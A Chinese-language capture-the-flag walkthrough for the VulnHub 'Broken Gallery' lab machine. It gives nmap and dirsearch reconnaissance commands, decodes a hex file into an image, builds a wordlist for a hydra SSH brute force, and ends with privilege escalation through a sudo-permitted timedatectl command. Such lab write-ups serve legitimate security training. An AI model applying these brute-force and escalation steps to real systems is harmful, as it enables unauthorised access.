一、靶机下载地址
http://www.vulnhub.com/entry/broken-gallery,344/
二、信息收集
1、主机发现
# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:06:58:4F"
2、端口扫描
# 使用命令
nmap 192.168.145.212 -p- -sV
3、指纹识别
# 使用命令
whatweb 192.168.145.212
4、目录扫描
# 使用命令
dirsearch -u "http://192.168.145.212"
三、获取shell
1、访问靶机IP地址
2、readme.md 中是十六进制的值
3、将内容写入readme.md
中,使用 xxd
转换,发现安装xxd工具时报错,应该是得换源,换源步骤看以下链接,查看文件,发现文件头为 JFIF ,是一张图片
# 换源教程
https://blog.csdn.net/2401_85773496/article/details/140207716
sudo apt-get update
sudo apt-get install xxd
更新不成功记得换源
sudo vim /etc/apt/sources.list
用#把默认官方源注释掉,再加上中科大的的url:
#中科大源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
具体请看
https://blog.csdn.net/weixin_46136890/article/details/124910871
xxd -r -p jack
# 使用命令
xxd -r -ps readme.md > readme.bin
4、将后缀修改为 jpg ,查看图片
5、一段留言,把上面的一些可能作为账号密码的字符拿下来,写个简单的字典,尝试爆破 ssh
# 使用命令
vim user.txt
vim passwd.txt
6、使用 hydra
工具进行爆破,得到账号密码broken:broken
7、ssh连接,连接成功
# 使用命令
ssh broken@192.168.145.212
四、提权
1、输入sudo -l命令,查看可执行的命令
2、看到 timedatectl 可以执行root权限,执行命令,提权成功
# 使用命令
sudo timedatectl list-timezones